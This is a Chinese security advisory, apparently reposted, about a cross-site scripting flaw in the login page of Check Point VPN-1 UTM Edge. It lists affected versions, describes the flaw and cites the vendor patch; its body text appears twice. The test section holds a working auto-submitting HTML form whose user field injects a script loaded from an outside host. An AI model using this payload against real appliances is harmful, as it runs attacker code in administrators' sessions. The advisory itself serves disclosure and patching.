Check Point VPN-1 UTM Edge登录页面跨站脚本漏洞
程序员文章站
2022-09-30 13:20:22
受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.0.48x
不受影响系统:
Check Point Software VPN-1 UTM Edge NGX 7.5.48
描述:
----------------... 08-10-08...
受影响系统:
check point software vpn-1 utm edge ngx 7.0.48x
不受影响系统:
check point software vpn-1 utm edge ngx 7.5.48
描述:
--------------------------------------------------------------------------------
bugtraq id: 28116 vpn-1 utm edge是集成了防病毒、防火墙、入侵防护和vpn技术的安全接入解决方案。 vpn-1 utm edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。 vpn-1 utm edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意html和脚本代码。由于设备不接受get请求中的参数,因此攻击者必须要使用post请求来利用这个漏洞。 <*来源:henri lindberg (henri.lindberg@louhi.fi)
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*> 测试方法:
-------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none"> <input name="user" value="'<script/src=//l7.fi></script>"> </form>
</body>
</html> 建议:
--------------------------------------------------------------------------------
厂商补丁: check point software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.checkpoint.com
check point software vpn-1 utm edge ngx 7.0.48x
不受影响系统:
check point software vpn-1 utm edge ngx 7.5.48
描述:
--------------------------------------------------------------------------------
bugtraq id: 28116 vpn-1 utm edge是集成了防病毒、防火墙、入侵防护和vpn技术的安全接入解决方案。 vpn-1 utm edge的管理界面在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞执行跨站脚本攻击。 vpn-1 utm edge的登录页面没有正确地过滤user参数便返回给了用户,这允许攻击者通过跨站脚本攻击在用户浏览器会话中执行任意html和脚本代码。由于设备不接受get请求中的参数,因此攻击者必须要使用post请求来利用这个漏洞。 <*来源:henri lindberg (henri.lindberg@louhi.fi)
链接:http://secunia.com/advisories/29243/
http://marc.info/?l=bugtraq&m=120483120818369&w=2
*> 测试方法:
-------------------------------------------------------------------------------- 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <html>
<body onload="document.f.submit()">
<form name="f" method="post" action="http://192.168.10.1"
style="display:none"> <input name="user" value="'<script/src=//l7.fi></script>"> </form>
</body>
</html> 建议:
--------------------------------------------------------------------------------
厂商补丁: check point software
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.checkpoint.com